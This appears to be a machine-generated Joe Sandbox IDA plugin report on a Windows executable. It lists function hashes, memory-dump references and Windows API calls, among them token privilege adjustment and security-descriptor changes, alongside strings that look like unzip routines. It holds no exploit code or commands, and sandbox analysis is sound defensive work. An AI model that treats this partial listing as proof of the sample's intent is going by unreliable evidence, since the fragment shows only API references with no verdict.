                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastType
                                          • String ID:
                                          • API String ID: 1809617866-0
                                          • Opcode ID: 9034867e0e5f656806f9e8757dd3215358153a44656e4880629306d682652c13
                                          • Instruction ID: 0ae395d7474f1af9b9c6e449919d5970c2ed78d5f3119fdd6490fe40e80d97b9
                                          • Opcode Fuzzy Hash: 9034867e0e5f656806f9e8757dd3215358153a44656e4880629306d682652c13
                                          • Instruction Fuzzy Hash: B8811271D1420896EF209F68C8847EF7B64EF01768F28421FE951A63D1C7BC89C687CA

                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000100,00000000), ref: 0041B669
                                          • GetLastError.KERNEL32 ref: 0041B673
                                          • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 0041B73A
                                          • GetLastError.KERNEL32 ref: 0041B744
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastRead
                                          • String ID:
                                          • API String ID: 1948546556-0
                                          • Opcode ID: 662fd1020942aae6793e2087e8affa122bfdd206edd3d2d1eb422e75de9f09a4
                                          • Instruction ID: 5320c27688b98f5302928a735e1011bfd1bbdf3e9bbdda589cca2c7182946b54
                                          • Opcode Fuzzy Hash: 662fd1020942aae6793e2087e8affa122bfdd206edd3d2d1eb422e75de9f09a4
                                          • Instruction Fuzzy Hash: 5461D434604385DFDF218F58C884BEA7BB1EF66314F14409BE8618B391D37899C6CB9A

                                          APIs
                                          • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000001,?,?,?,004119DD,00000000,00439BA4), ref: 00411E2F
                                          • GetFileTime.KERNEL32(00000000,?,?,?,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411E50
                                          • CloseHandle.KERNEL32(00000000,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411E59
                                            • Part of subcall function 00412020: FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0041202E
                                            • Part of subcall function 00412020: FileTimeToSystemTime.KERNEL32(?,?), ref: 00412050
                                          • GetFileAttributesA.KERNELBASE(?,00000000,00000001,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411F49
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: File$Time$AttributesCloseCreateHandleLocalSystem
                                          • String ID:
                                          • API String ID: 3576422975-0
                                          • Opcode ID: 3cad0420f0cdd6335c139d48f8f330720120e89d336076a35baf0621a384d64a
                                          • Instruction ID: 9a36ea26c0d62d6c96e4ebb2062f951fe69ccc09c33042294df6f6886f757777
                                          • Opcode Fuzzy Hash: 3cad0420f0cdd6335c139d48f8f330720120e89d336076a35baf0621a384d64a
                                          • Instruction Fuzzy Hash: 5751C3316043015BD710DF6AEC81BEBB7E8EB94764F440A2EFE44C3261F369E54A87A5

                                          APIs
                                          • WriteFile.KERNELBASE(?,?,?,00000000,00000000,00000001,00000000,?), ref: 004156EA
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0

                                          Control-flow Graph (image not reproduced; first block 41908b-419098)
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,pVA,00000000,00000000,00000000,00000000,?,00415670,00000000,00000000,00000002,00000001,00000000,?), ref: 004190DA
                                          • GetLastError.KERNEL32 ref: 004190E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID: pVA
                                          • API String ID: 2976181284-1183464086
                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004148D6,00000000), ref: 00417646
                                            • Part of subcall function 004174ED: GetVersionExA.KERNEL32 ref: 0041750C
                                          • HeapDestroy.KERNEL32 ref: 00417685
                                            • Part of subcall function 00417692: HeapAlloc.KERNEL32(00000000,00000140,0041766E,000003F8), ref: 0041769F
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Heap$AllocCreateDestroyVersion
                                          • String ID:
                                          • API String ID: 2507506473-0
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5), ref: 00411DA5
                                          • GetConsoleScreenBufferInfo.KERNELBASE(00000000), ref: 00411DB1
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: BufferConsoleHandleInfoScreen
                                          • String ID:
                                          • API String ID: 3205511803-0
                                          APIs
                                          • CloseHandle.KERNELBASE(00000000,00000100,00000000,?,00000000,0041BA87,00000000), ref: 00419CD3
                                          • GetLastError.KERNEL32(?,00000000,0041BA87,00000000), ref: 00419CDD
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast
                                          • String ID:
                                          • API String ID: 918212764-0
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,00413296,000000E0,00413283,?,00418AD9,00000100), ref: 0041331E
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,00000000,004125D0), ref: 0041283A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00412841
                                          • LookupPrivilegeValueA.ADVAPI32 ref: 00412874
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00412898
                                          • GetLastError.KERNEL32 ref: 0041289E
                                          • CloseHandle.KERNEL32(?), ref: 004128B3
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,00000000), ref: 004128D5
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004128ED
                                          • GetLastError.KERNEL32 ref: 004128F3
                                          • CloseHandle.KERNEL32(?), ref: 00412908
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Token$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesProcessValue$CurrentOpen
                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                          • API String ID: 1809565852-639343689
                                          APIs
                                          • CreateFileA.KERNEL32(00000008,010E0000,00000005,00000000,00000003,02000000,00000000,76ECFFB0,00000000,00000001,76ECE820,004124B5,?,?), ref: 0041261C
                                          • GetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000,00000000,?), ref: 00412643
                                          • GetLastError.KERNEL32 ref: 00412645
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00412657
                                          • HeapAlloc.KERNEL32(00000000), ref: 0041265E
                                          • GetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000,?,?), ref: 00412678
                                          • SetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000), ref: 00412682
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00412697
                                          • HeapFree.KERNEL32(00000000), ref: 0041269E
                                          • CloseHandle.KERNEL32(00000000), ref: 004126A5
                                          • CreateFileA.KERNEL32(00000008,01000000,00000007,00000000,00000003,00000000,00000000), ref: 004126C0
                                          • CloseHandle.KERNEL32(00000000), ref: 004126C8
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Heap$KernelObjectSecurity$CloseCreateFileHandleProcess$AllocErrorFreeLast
                                          • String ID:
                                          • API String ID: 1259232358-0
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BC86
                                          • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000001), ref: 0041BC99
                                          • GetLocaleInfoA.KERNEL32(?,?,00000000,00000080,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BCC0
                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BCE9
                                          • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 0041BD2C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 0041BD52
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1691099609-0
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BB73
                                          • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BB86
                                          • GetLocaleInfoW.KERNEL32(?,?,00000000,00000004,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BBAD
                                          • GetLocaleInfoA.KERNEL32(?,?,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BBD2
                                          • GetLocaleInfoA.KERNEL32(?,?,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC13
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC34
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1691099609-0
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,-00001002,?,00000078), ref: 00416D7F
                                          • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000078), ref: 00416DC5
                                          • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000078), ref: 00416E96
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 0041BD2C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 0041BD52
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharInfoLocaleMultiWide
                                          • String ID:
                                          • API String ID: 1196101659-0
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(?,?,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC13
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC34
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharInfoLocaleMultiWide
                                          • String ID:
                                          • API String ID: 1196101659-0
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 0041729D
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,-00001001,?,00000078), ref: 00416FD7
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,-00001002,?,00000078), ref: 004170CB
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000000,00000001,?,00000078), ref: 004171DE
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          APIs
                                          • EnumSystemLocalesA.KERNEL32(00416D51,00000001,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416D30
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2099609381-0
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000400,00000021,?,00000002,00000000,0040941D), ref: 00411CBF
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          APIs
                                          • EnumSystemLocalesA.KERNEL32(00416FAB,00000001,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416F94
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2099609381-0
                                          APIs
                                          • EnumSystemLocalesA.KERNEL32(0041709F,00000001,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00417088
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2099609381-0
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000400,0000001D,?,00000002,?,00409426), ref: 00411CFF
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          APIs
                                            • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,020405B8), ref: 0040F6BA
                                          • CreateFileA.KERNEL32(?,00000100,00000003,00000000,00000003,02000000,00000000,00000000,?,00000000,?,00403F26,?), ref: 0040FF28
                                          • GetLastError.KERNEL32(00000000,?,00000001), ref: 0041005E
                                          Strings
                                          • warning: SetFileTime() for %s error %d, xrefs: 004100EF
                                          • warning: CreateFile() error %d (set file times for %s), xrefs: 00410065
                                          • set attrib: %-22s , xrefs: 0040FF55
                                          • compressed WinNT security data missing (%d bytes)%s, xrefs: 0040FFEB
                                          • %-22s , xrefs: 0040FFB7
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: CreateErrorFileLastVersion
                                          • String ID: compressed WinNT security data missing (%d bytes)%s$ set attrib: %-22s $%-22s $warning: SetFileTime() for %s error %d$warning: CreateFile() error %d (set file times for %s)
                                          • API String ID: 2621615039-3452739180
                                          APIs
                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,0041A4B1,?,Microsoft Visual C++ Runtime Library,00012010,?,00423494,?,004234E4,?,?,?,Runtime Error!Program: ), ref: 0041BABD
                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041BAD5
